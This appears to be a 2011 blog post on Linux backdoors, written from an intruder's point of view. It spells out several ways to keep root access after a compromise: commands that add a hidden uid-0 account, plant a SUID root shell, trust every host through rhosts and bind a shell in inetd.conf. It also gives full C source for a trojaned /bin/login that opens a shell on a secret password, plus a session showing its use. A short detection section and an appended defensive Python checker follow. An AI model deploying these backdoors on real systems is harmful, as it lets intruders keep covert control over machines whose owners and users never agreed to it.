Sunday, April 3, 2011

Advanced Hacker Techniques and Practice: Linux Backdoors

Introduction: a backdoor is what an intruder leaves behind after taking full control of a system, so that getting back in and using the machine next time is easy.

Backdoors are generally implemented by modifying system configuration files or by installing third-party tools. A good one is hidden, bypasses the system logs, and is not easily found by the system administrator. Common backdoor techniques:

- adding a superuser account
- cracking or sniffing user passwords
- placing a SUID shell
- rhosts "+ +"
- abusing system service programs
- TCP/UDP/ICMP shells
- Crontab scheduled tasks
- shared library files
- rootkits
- loadable kernel modules (LKM)

Adding a root account:

    # echo "e4gle:x:0:0::/:/bin/sh" >> /etc/passwd
    # echo "e4gle::-1:-1:-1:-1:-1:-1:500" >> /etc/shadow

If the system does not allow uid 0 users to log in remotely, a normal user account also has to be added.

Cracking or sniffing user passwords: take the shadow file and use a tool such as John the Ripper to crack weak user passwords; or install a sniffer such as sniffit to listen on the telnet and FTP ports and collect users' passwords.

Placing a SUID shell:

    # cp /bin/bash /dev/.rootshell
    # chmod u+s /dev/.rootshell

An ordinary user who runs /dev/.rootshell locally then obtains a shell with root permissions.

rhosts "+ +":

    # echo "+ +" > /.rhosts
    # rsh -l root victim.com csh -i

gives a root shell remotely.

Abusing system service programs: modify /etc/inetd.conf (for example "daytime stream tcp nowait /bin/sh sh -i"), replace inetd service programs such as in.telnetd or in.rexecd with trojaned versions, or redirect the login program.

TCP/UDP/ICMP shells: a BindShell is mostly a network service program based on TCP or UDP that listens on a high port, so it can be found easily. A Ping Backdoor is a shell backdoor activated by ICMP packets. A TCP ACK packet backdoor is able to pass through firewalls.

Crontab scheduled tasks: a backdoor installed through the crontab program and scheduled to run at a time when the system administrator is not online, usually late at night.

Shared library files: backdoor functions embedded in a shared library, activated by the backdoor password to obtain a shell. This escapes the administrator's checksums of the binary files themselves.
Rootkits: a rootkit contains a series of system and backdoor tools: clearing login logs, camouflaging checksums, replacing netstat, ps and other network tools, and a backdoor login program. They are easy to install and use.

Loadable kernel modules (LKM): dynamically loaded modules that do not require recompiling the kernel. They intercept system calls and can hide directories, files, processes, network connections and more. They are very stealthy and hard to find. Well-known examples are the adore and knark packages.

Backdoor detection: in my own experience, combine specific tools with some manual checking. Use md5 checksums or Tripwire to check the system. Use an IDS to watch for suspicious network connections to the target machine.

Example: login backdoor. The intruder backs up the original /bin/login and replaces it with a trojaned /bin/login. When the intruder telnets in and passes the correct backdoor password through an environment variable or the terminal type, they directly receive a shell; when a normal user logs in, the request is redirected to the original login file, which handles the normal login. The simplest login backdoor, ulogin.c:

    /* ulogin.c: the login backdoor shown in the post */
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>

    #define PASSWORD    "passWORD"       /* backdoor password */
    #define _PATH_LOGIN "/sbin/logins"   /* where the original login was moved */

    int main(int argc, char **argv, char **envp)
    {
        char *display = getenv("DISPLAY");

        /* no DISPLAY set: hand over to the real login program */
        if (display == NULL) {
            execve(_PATH_LOGIN, argv, envp);
            perror(_PATH_LOGIN);
            exit(1);
        }
        /* DISPLAY matches the backdoor password: spawn a shell */
        if (!strcmp(display, PASSWORD)) {
            system("/bin/cs");
            exit(1);
        }
        /* anything else: normal login */
        execve(_PATH_LOGIN, argv, envp);
        exit(1);
    }

To use the login backdoor the telnet service must first be turned on; then, on your own machine:

    bash$ export DISPLAY=passWORD
    bash$ telnet victim.com
    Trying xxx.xxx.xxx.xxx...
    Connected to victim.com (xxx.xxx.xxx.xxx).
    Escape character is '^]'.
    %

The strings command: strings prints the displayable strings contained in a binary file. Run on the ulogin program above:

    bash$ strings ulogin
    /lib/ld-linux.so.2
    ..............
    DISPLAY
    /sbin/logins
    passWORD
    /bin/cs
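As an added defender-side example (not part of the original post), the script below checks configuration text for three of the indicators the post describes: an extra uid-0 account in /etc/passwd, a "+ +" line in .rhosts, and an inetd.conf service whose server program is a shell. The sample inputs are constructed inline so it runs offline.

```python
# Added example, not from the original post: parse /etc/passwd, .rhosts and
# inetd.conf text for three backdoor indicators. Sample data is constructed.
SHELLS = {"/bin/sh", "/bin/bash", "/bin/csh", "/bin/ksh"}

def extra_uid0_accounts(passwd_text):
    """Names of uid-0 accounts other than root (the extra superuser trick)."""
    hits = []
    for line in passwd_text.splitlines():
        f = line.split(":")
        if len(f) >= 7 and f[2] == "0" and f[0] != "root":
            hits.append(f[0])
    return hits

def rhosts_trusts_everyone(rhosts_text):
    """True if a .rhosts line is '+ +', i.e. any user from any host."""
    return any(line.split() == ["+", "+"] for line in rhosts_text.splitlines())

def inetd_shell_services(inetd_text):
    """Services in inetd.conf whose server program is a shell."""
    hits = []
    for line in inetd_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        f = line.split()
        # Format: service socktype proto wait[.max] [user] server [args]
        if len(f) >= 5 and any(tok in SHELLS for tok in f[4:]):
            hits.append(f[0])
    return hits

# Constructed sample data: one clean line and one suspicious line each
SAMPLE_PASSWD = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "e4gle:x:0:0::/:/bin/sh\n"
    "bob:x:1000:1000::/home/bob:/bin/bash\n"
)
SAMPLE_RHOSTS = "+ +\n"
SAMPLE_INETD = (
    "ftp stream tcp nowait root /usr/sbin/in.ftpd in.ftpd\n"
    "daytime stream tcp nowait root /bin/sh sh -i\n"
)

if __name__ == "__main__":
    print("extra uid 0 accounts:", extra_uid0_accounts(SAMPLE_PASSWD))
    print("rhosts trusts everyone:", rhosts_trusts_everyone(SAMPLE_RHOSTS))
    print("inetd services spawning a shell:", inetd_shell_services(SAMPLE_INETD))
```

On a real host, feed the functions the contents of the actual files and compare the results against a baseline taken when the system was known to be clean.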
